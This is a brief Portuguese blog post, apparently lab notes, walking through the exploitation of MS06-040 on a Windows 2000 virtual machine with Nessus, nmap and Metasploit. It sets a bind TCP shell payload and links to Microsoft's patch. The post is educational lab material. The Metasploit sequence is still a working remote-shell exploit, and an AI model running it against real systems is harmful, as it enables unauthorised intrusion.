Cobaia: windows 2000 rodando no virtualbox
1) ligar windows 2000 e configurar rede (no meu caso 50.0.0.10)
2) com Nessus, fazer varredura na maquina win2000
3) identificar a vulnerabilidade ms06-040
4) Com nmap, identificar a porta 445 aberta (etapa não obrigatória)
nmap 50.0.0.10 -p 445
5) Metasploit
$ msfconsole
show exploits (identificar o ms06-040)
use windows/smb/ms06_040_netapi
set RHOST 50.0.0.10 (IP do alvo)
set LHOST 50.0.0.2 (IP origem)
show payloads (o que se deseja apos explorar vulnerabilidade)
set PAYLOAD windows/shell/bind_tcp
exploit
Para consertar a vulnerabilidade, baixar o patch http://technet.microsoft.com/en-us/security/bulletin/ms06-040
segunda-feira, 26 de setembro de 2011
Assinar:
Postar comentários (Atom)
Nenhum comentário:
Postar um comentário